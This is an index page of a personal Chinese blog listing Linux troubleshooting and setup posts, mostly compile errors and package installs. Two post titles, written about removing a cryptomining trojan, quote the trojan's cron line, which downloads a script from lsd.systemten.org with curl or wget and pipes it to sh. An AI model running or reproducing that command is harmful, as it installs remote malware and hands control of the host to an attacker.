jack-wang
小王
C++博客
首页
新随笔
联系
聚合
管理
随笔-379 评论-37 文章-0 trackbacks-0
linux
dnf安装失败
posted @
2024-11-27 03:33
小王 阅读(82) |
评论 (0)
编辑
vs code中git push代码报错:Missing or invalid credentials.
posted @
2024-05-10 02:53
小王 阅读(94) |
评论 (0)
编辑
openEuler系统中修改系统时间
posted @
2024-04-27 07:07
小王 阅读(2909) |
评论 (0)
编辑
openEuler重启网络命令
posted @
2024-03-19 15:28
小王 阅读(1394) |
评论 (0)
编辑
新安装的Ubuntu22中无法apt安装软件,报错:Failed to fetch http://cn.archive.ubuntu.com/,,,,,,
posted @
2024-03-19 15:09
小王 阅读(69) |
评论 (0)
编辑
x86服务器下执行arm64程序报错:/lib64/ld-linux-aarch64.so.1: No such file or directory
posted @
2024-03-15 16:55
小王 阅读(146) |
评论 (0)
编辑
U盘安装linux操作系统
posted @
2024-03-05 20:01
小王 阅读(64) |
评论 (0)
编辑
编译报错:/lib/../lib64/crt1.o:在函数‘_start’中(.text+0x20)对‘main’未定义的引用 collect2: error: ld returned 1exit status
posted @
2024-03-05 12:18
小王 阅读(670) |
评论 (0)
编辑
编译grpc报错:Package 'libsystemd', required by 'virtual:world', not found
posted @
2024-02-27 20:51
小王 阅读(821) |
评论 (0)
编辑
docker hub中pull的Ubuntu 22.04 image生成的容器中,systemctl restart sshd命令失败
posted @
2024-01-02 04:29
小王 阅读(1212) |
评论 (0)
编辑
Ubuntu中apt安装软件包报错:Failed to fetch http://,,,,,,
posted @
2024-01-01 12:04
小王 阅读(78) |
评论 (0)
编辑
解压.run
posted @
2023-12-15 14:50
小王 阅读(1423) |
评论 (0)
编辑
查看glibc版本号
posted @
2023-12-08 15:52
小王 阅读(1496) |
评论 (0)
编辑
使用VS Code ssh远程连接openEuler主机,始终连接不上
posted @
2023-10-22 18:26
小王 阅读(102) |
评论 (0)
编辑
重编openEuler22内核
posted @
2023-10-10 21:00
小王 阅读(223) |
评论 (0)
编辑
编译gcc10报错:error: C++ preprocessor "/lib/cpp" fails sanity check
posted @
2023-10-10 16:11
小王 阅读(134) |
评论 (0)
编辑
openEuler中更换gcc版本
posted @
2023-10-10 11:32
小王 阅读(396) |
评论 (0)
编辑
编译gcc7报错:gcc invalid application of ‘sizeof’ to incomplete type ‘__sanitizer::ustat’ ,,,,,,unsigned struct_ustat_sz = sizeof(struct ustat);
posted @
2023-10-10 11:24
小王 阅读(117) |
评论 (0)
编辑
编译gcc7报错:fatal error: sys/ustat.h: No such file or directory
posted @
2023-10-10 11:20
小王 阅读(117) |
评论 (0)
编辑
编译openEuler22内核报错:Failed to generate BTF for vmlinux
posted @
2023-10-09 11:54
小王 阅读(1304) |
评论 (0)
编辑
安装WSL2
posted @
2023-04-05 01:33
小王 阅读(107) |
评论 (0)
编辑
Liunx中修改文件结束符
posted @
2022-12-22 13:53
小王 阅读(157) |
评论 (0)
编辑
CentOS编译OpenCV报错:undefined reference to `hb_buffer_get_glyph_infos'
posted @
2022-12-20 01:44
小王 阅读(3396) |
评论 (0)
编辑
安装Cygwin
posted @
2022-11-07 17:01
小王 阅读(112) |
评论 (0)
编辑
CentOS手动安装OpenSSL1.1.1(以此为准)
posted @
2022-09-19 03:29
小王 阅读(947) |
评论 (0)
编辑
安装CUDA后查看版本信息(nvcc -V )报错:command not found
posted @
2022-07-27 16:58
小王 阅读(1861) |
评论 (0)
编辑
查看Linux版本信息
posted @
2022-07-27 11:10
小王 阅读(102) |
评论 (0)
编辑
Ubuntu中apt更新失败:GPG error: https://developer.download.nvidia.cn/compute/cuda/repos/ubuntu180,,,,,
posted @
2022-07-26 17:15
小王 阅读(3738) |
评论 (0)
编辑
kswapd0占用内存过高
posted @
2022-07-11 15:12
小王 阅读(162) |
评论 (0)
编辑
CentOS安装OpenSSL1.1.1
posted @
2022-07-08 15:11
小王 阅读(574) |
评论 (0)
编辑
CentOS运行yum命令报错:Existing lock /var/run/yum.pid: another copy is running
posted @
2022-05-18 10:47
小王 阅读(188) |
评论 (0)
编辑
CentOS下编译报错: python3.6m/Python.h: No such file or directory
posted @
2022-05-12 17:52
小王 阅读(706) |
评论 (0)
编辑
CentOS开启自动运行脚本
posted @
2022-05-09 10:32
小王 阅读(118) |
评论 (0)
编辑
CentOS7编译报错:undefined reference to `dlopen'
posted @
2022-02-28 03:03
小王 阅读(312) |
评论 (0)
编辑
Linux中执行脚本报错:/bin/bash^M: bad interpreter: No such file or directory
posted @
2022-02-24 20:14
小王 阅读(111) |
评论 (0)
编辑
Ubuntu apt install 报错:无法获得锁 /var/lib/dpkg/lock-frontend - open
posted @
2022-02-24 15:39
小王 阅读(84) |
评论 (0)
编辑
Ubuntu启动使用root账户登录图形界面
posted @
2022-02-24 14:14
小王 阅读(100) |
评论 (0)
编辑
Ubuntu中使用QT报错:Error on execution -version `Qt_5' not found required by
posted @
2022-02-22 20:08
小王 阅读(449) |
评论 (0)
编辑
VSCode使用私钥登录远程主机
posted @
2022-02-18 11:47
小王 阅读(361) |
评论 (0)
编辑
apt update时报错:,,,Permission denied
posted @
2022-02-18 10:53
小王 阅读(322) |
评论 (0)
编辑
腾讯云创建Ubuntu主机,使用秘钥只能登录默认创建的ubuntu账户
posted @
2022-02-17 16:03
小王 阅读(262) |
评论 (0)
编辑
编译log4cplus报错:"none" is not exported by the List::Util module
posted @
2022-01-21 15:21
小王 阅读(698) |
评论 (0)
编辑
编译automake-1.16报错:Try `--no-discard-stderr' if option outputs to stderr
posted @
2022-01-21 15:17
小王 阅读(410) |
评论 (0)
编辑
CentOS下编译报错:error: no matching function for call to ‘equal(std::basic_string
::const_iterator, , , ,
posted @
2022-01-14 23:44
小王 阅读(391) |
评论 (0)
编辑
CentOS下编译时报链接错误:找不到GLIBCXX_3.4.21,,,
posted @
2022-01-14 23:40
小王 阅读(1062) |
评论 (0)
编辑
Ubuntu18下编译pistache
posted @
2022-01-13 01:34
小王 阅读(407) |
评论 (0)
编辑
编译rapidjson报错:[-Werror=effc++]
posted @
2022-01-11 14:32
小王 阅读(441) |
评论 (0)
编辑
CMake报错:"STREQUAL" "x86_64" Unknown arguments specified
posted @
2021-12-22 16:24
小王 阅读(2364) |
评论 (0)
编辑
CentOS7默认开启防火墙,沃尼玛
posted @
2021-12-22 15:16
小王 阅读(133) |
评论 (0)
编辑
Centos中安装Docker
posted @
2021-12-09 19:23
小王 阅读(125) |
评论 (0)
编辑
CentOS中安装MariaDB10.x
posted @
2021-12-09 15:54
小王 阅读(248) |
评论 (0)
编辑
VSCode配置开发远程Linux主机的工作环境
posted @
2021-12-08 17:19
小王 阅读(257) |
评论 (0)
编辑
新装的CentOS中,使用sudo命令报错:“ is not in the sudoers file”
posted @
2021-12-08 14:51
小王 阅读(256) |
评论 (0)
编辑
Linux 下bsub命令
posted @
2021-10-05 01:52
小王 阅读(3601) |
评论 (0)
编辑
Ubuntu18安装配置ninja
posted @
2021-03-15 23:24
小王 阅读(4112) |
评论 (0)
编辑
Ubuntu18安装配置Python
posted @
2021-03-15 23:13
小王 阅读(243) |
评论 (0)
编辑
重装Ubuntu
posted @
2021-02-22 11:01
小王 阅读(308) |
评论 (0)
编辑
CentOS7下安装MySQL5.7
posted @
2021-01-17 20:51
小王 阅读(362) |
评论 (0)
编辑
MQTT服务器EMQX安装
posted @
2021-01-12 15:35
小王 阅读(972) |
评论 (0)
编辑
编译报错:cannot specify -o with -c, -S or -E with multiple files
posted @
2020-12-01 22:11
小王 阅读(4872) |
评论 (0)
编辑
安装gthread
posted @
2020-11-05 17:49
小王 阅读(2291) |
评论 (0)
编辑
磁盘空间不足,报错:Write error in swap file
posted @
2020-10-29 14:54
小王 阅读(1320) |
评论 (0)
编辑
CentOS7下安装RabbitMQ
posted @
2020-10-13 17:29
小王 阅读(508) |
评论 (0)
编辑
ulimit -c 永久生效
posted @
2020-09-16 17:56
小王 阅读(2013) |
评论 (0)
编辑
coredump配置
posted @
2020-09-15 16:02
小王 阅读(580) |
评论 (0)
编辑
Linux修改系统时间
posted @
2020-07-10 15:03
小王 阅读(437) |
评论 (0)
编辑
安装ROS
posted @
2020-07-06 04:28
小王 阅读(296) |
评论 (0)
编辑
Ubuntu安装SSH服务
posted @
2020-06-29 13:59
小王 阅读(220) |
评论 (0)
编辑
Program received signal SIGPIPE, Broken pipe
posted @
2020-06-08 01:20
小王 阅读(637) |
评论 (0)
编辑
Centos添加新用户
posted @
2020-04-07 18:41
小王 阅读(420) |
评论 (0)
编辑
编译安装MQTT客户端paho
posted @
2020-03-10 11:53
小王 阅读(2273) |
评论 (0)
编辑
VS2019配置连接远程linux主机时报错:Could not start the 'rsync' command on the remote host, please install it us
posted @
2020-03-10 11:16
小王 阅读(1350) |
评论 (0)
编辑
编译cmake报错:Cannot find a C++ compiler that supports both C++11 and the specified C++ flags. Please specify one
posted @
2020-01-10 15:20
小王 阅读(2793) |
评论 (0)
编辑
Centos中升级gcc(编译cmake报错:‘make_unique’不是‘std’的成员)
posted @
2020-01-10 15:11
小王 阅读(1532) |
评论 (0)
编辑
编译cmake报错:Cannot find a C++ compiler that supports both C++11 and the specified C++ flags.
posted @
2020-01-10 13:57
小王 阅读(7868) |
评论 (0)
编辑
查杀挖矿木马病毒:*/15 * * * * (curl -fsSL lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##
posted @
2019-11-18 02:55
小王 阅读(566) |
评论 (0)
编辑
挖矿木马病毒:*/15 * * * * (curl -fsSL lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##
posted @
2019-11-13 11:33
小王 阅读(320) |
评论 (0)
编辑
CentOS配置jdk开发环境
posted @
2019-10-14 17:45
小王 阅读(245) |
评论 (0)
编辑
CentOS无法查询IP地址
posted @
2019-10-14 15:11
小王 阅读(178) |
评论 (0)
编辑
CentOS yum安装时出现“Could not retrieve mirrorlist”
posted @
2019-06-15 14:09
小王 阅读(328) |
评论 (0)
编辑
Centos下报错: mysql_config: command not found
posted @
2017-12-09 17:05
小王 阅读(817) |
评论 (0)
编辑
Ubuntu下报错: mysql_config: command not found
posted @
2017-12-09 17:01
小王 阅读(365) |
评论 (0)
编辑
CentOS下配置C++开发环境
posted @
2017-12-09 16:58
小王 阅读(1148) |
评论 (0)
编辑
CentOS下报错:cannot find a valid baseurl for repo:base/7/x86_64
posted @
2017-12-09 15:08
小王 阅读(799) |
评论 (0)
编辑
Ubuntu下编译报错:AM_PROG_LIBTOOL
posted @
2017-12-09 14:31
小王 阅读(594) |
评论 (0)
编辑
Ubuntu下安装perl
posted @
2017-12-09 11:20
小王 阅读(540) |
评论 (0)
编辑
Ubuntu C++开发环境配置
posted @
2017-12-08 16:19
小王 阅读(322) |
评论 (0)
编辑
Ubuntu16 配置Java环境变量
posted @
2017-02-27 14:22
小王 阅读(244) |
评论 (0)
编辑
ubuntu下vi中方向键变成ABCD
posted @
2017-01-20 18:17
小王 阅读(249) |
评论 (0)
编辑
vim无法保存文件,报错“E212: Can't open file for writing”
posted @
2017-01-20 17:29
小王 阅读(2807) |
评论 (0)
编辑
用 Eclipse 平台进行 C/C++ 开发
posted @
2010-11-02 01:00
小王 阅读(381) |
评论 (0)
编辑
开发笔记:在Ubuntu下安装JDK 6和Eclipse
posted @
2010-11-02 00:57
小王 阅读(401) |
评论 (0)
编辑
编译openfetion2
posted @
2010-11-02 00:27
小王 阅读(499) |
评论 (0)
编辑
编译Openfetion
posted @
2010-11-01 00:31
小王 阅读(422) |
评论 (0)
编辑
Ubuntu9.10 VI下方向键变成ABCD的解决办法
posted @
2010-10-30 20:07
小王 阅读(1121) |
评论 (3)
编辑
安装完Ubuntu时,安装程序没有提示我我输入root密码
posted @
2010-02-08 16:29
小王 阅读(539) |
评论 (0)
编辑
VirtualBox下的Ubuntu的全屏问题
posted @
2010-02-08 11:02
小王 阅读(905) |
评论 (0)
编辑
Linux平台gcc和动态共享库的基础知识(转)
posted @
2010-01-21 18:22
小王 阅读(531) |
评论 (0)
编辑
分析Windows和Linux动态库
posted @
2010-01-21 18:07
小王 阅读(345) |
评论 (0)
编辑
<
2024年12月
>
日
一
二
三
四
五
六
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
1
2
3
4
常用链接
我的随笔
我的评论
我参与的随笔
留言簿
(16)
给我留言
查看公开留言
查看私人留言
随笔分类
(441)
Android(7)
Boost(8)
C#
c++ 程序设计基础(11)
CMake(2)
Cocos2d-X(1)
CUDA(3)
DB(21)
DirectX(2)
Docker(5)
Dubbo(3)
Erlang(5)
Git(6)
GO(1)
IE(1)
iOS(1)
Java(19)
JPA(2)
LibTorch(1)
linux(99)
MQTT(2)
node.js(3)
OpenGL(2)
Python(15)
Qt(7)
Redis(5)
ROS(4)
SpringBoot(4)
TensorRT(3)
UI(5)
Unreal Engine(1)
VC(44)
VLC(2)
Web开发(12)
Win32(4)
编译(34)
操作系统(3)
调试(2)
多核编程(3)
分布式系统(4)
汇编(1)
脚本(1)
开源项目(3)
其他(16)
嵌入式(1)
软件工程(5)
瑞芯微(1)
设计模式(7)
算法与数据结构(1)
网络通讯(17)
音视频(7)
游戏服务器端开发(17)
游戏引擎(7)
随笔档案
(379)
2024年11月 (2)
2024年10月 (1)
2024年6月 (2)
2024年5月 (4)
2024年4月 (4)
2024年3月 (9)
2024年2月 (1)
2024年1月 (6)
2023年12月 (2)
2023年10月 (8)
2023年9月 (1)
2023年7月 (2)
2023年5月 (1)
2023年4月 (3)
2023年3月 (2)
2022年12月 (2)
2022年11月 (3)
2022年10月 (3)
2022年9月 (5)
2022年8月 (2)
2022年7月 (10)
2022年6月 (5)
2022年5月 (7)
2022年4月 (4)
2022年3月 (1)
2022年2月 (11)
2022年1月 (6)
2021年12月 (7)
2021年10月 (3)
2021年6月 (2)
2021年4月 (1)
2021年3月 (3)
2021年2月 (1)
2021年1月 (3)
2020年12月 (2)
2020年11月 (1)
2020年10月 (2)
2020年9月 (2)
2020年7月 (4)
2020年6月 (2)
2020年4月 (3)
2020年3月 (2)
2020年2月 (2)
2020年1月 (3)
2019年11月 (2)
2019年10月 (5)
2019年9月 (1)
2019年8月 (3)
2019年7月 (1)
2019年6月 (6)
2019年5月 (4)
2019年4月 (2)
2019年3月 (2)
2019年2月 (1)
2019年1月 (4)
2018年1月 (2)
2017年12月 (8)
2017年11月 (3)
2017年9月 (4)
2017年8月 (1)
2017年3月 (1)
2017年2月 (2)
2017年1月 (5)
2016年12月 (1)
2016年5月 (1)
2016年4月 (1)
2016年1月 (1)
2015年8月 (3)
2015年6月 (1)
2015年5月 (1)
2015年4月 (1)
2014年7月 (2)
2014年6月 (2)
2014年5月 (1)
2014年3月 (1)
2014年2月 (2)
2013年11月 (3)
2013年9月 (4)
2013年8月 (1)
2013年6月 (1)
2013年5月 (1)
2013年4月 (3)
2013年3月 (5)
2013年2月 (1)
2013年1月 (2)
2012年11月 (1)
2012年10月 (3)
2012年9月 (1)
2012年7月 (3)
2012年6月 (3)
2012年5月 (1)
2012年3月 (5)
2012年2月 (2)
2012年1月 (1)
2011年12月 (3)
2011年9月 (1)
2011年8月 (2)
2011年6月 (1)
2011年4月 (1)
2011年3月 (2)
2011年2月 (2)
2010年12月 (1)
2010年11月 (7)
2010年10月 (7)
2010年9月 (2)
2010年8月 (2)
2010年7月 (3)
2010年6月 (2)
2010年4月 (4)
2010年3月 (6)
2010年2月 (12)
2010年1月 (22)
2009年11月 (6)
2009年8月 (5)
2009年6月 (2)
2009年2月 (4)
2009年1月 (15)
2008年10月 (1)
Linux
chinaunix
游戏开发
金庆
云风
综合
Intel
λ-calculus
周伟明
最新随笔
1. dnf安装失败
2. RK3588设备中运行可执行程序报错:error while loading shared libraries: librknnrt.so: cannot open shared object file:
3. wget下载报错:The certificate of ‘www.python.org’ is not trusted.
4. 执行torch.load(模型名称, map_location='cpu')报错:from torchvision.transforms.functional_tensor import rgb_to_grayscale
5. pip安装basicsr报错:To fix this you could try to:
6. cmake文件中D_GLIBCXX_USE_CXX11_ABI=0,导致无法到入第三方库libjsoncpp.so
7. 链接libjsoncpp.a时报错:which may bind externally can not be used when making a shared object; recompile with -fPIC
8. vs code中git push代码报错:Missing or invalid credentials.
9. git clone报错:SSL certificate problem: self signed certificate in certificate chain
10. openEuler系统中修改系统时间
搜索
最新随笔
1. dnf安装失败
2. RK3588设备中运行可执行程序报错:error while loading shared libraries: librknnrt.so: cannot open shared object file:
3. wget下载报错:The certificate of ‘www.python.org’ is not trusted.
4. 执行torch.load(模型名称, map_location='cpu')报错:from torchvision.transforms.functional_tensor import rgb_to_grayscale
5. pip安装basicsr报错:To fix this you could try to:
6. cmake文件中D_GLIBCXX_USE_CXX11_ABI=0,导致无法到入第三方库libjsoncpp.so
7. 链接libjsoncpp.a时报错:which may bind externally can not be used when making a shared object; recompile with -fPIC
8. vs code中git push代码报错:Missing or invalid credentials.
9. git clone报错:SSL certificate problem: self signed certificate in certificate chain
10. openEuler系统中修改系统时间
最新评论
1. re: DirectUI Lib XML编写说明
这个不错,很有用。
--dictbox
2. re: MFC:为CListCtrl添加背景图片[未登录]
没用
--123
3. re: DirectUI Lib XML编写说明[未登录]
很好,对于我这样的初学者很用帮助,谢谢楼主
--king
4. re: WindowXP下PHP5开发环境配置
谢谢楼主分享,已经按楼主的方法配置成功
--bbreay
5. re: error C2220: 警告被视为错误 - 没有生成“object”文件
你好,我用的是vs2012,没有你说的“选择该cpp”,如:
--coco
阅读排行榜
1. protobuf使用方法(9367)
2. 执行pip install报错: WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv(8710)
3. 1>c:\program files\microsoft visual studio 9.0\vc\atlmfc\include\afx.h(24) : fatal error C1189: #error : Building MFC application with /MD[d] (CRT dll version) requires MFC shared dll version. Please #define _AFXDLL or do not use /MD[d](8572)
4. 编译cmake报错:Cannot find a C++ compiler that supports both C++11 and the specified C++ flags.(7868)
5. 把python3的版本从3.6升级到3.10(6942)
评论排行榜
1. 网游服务器通信架构的设计(3)
2. 公司散伙啦。杯具!反思!(3)
3. Ubuntu9.10 VI下方向键变成ABCD的解决办法(3)
4. kosmix,又一个开源的类似GFS的分布式文件系统(2)
5. DirectUI Lib XML编写说明(2)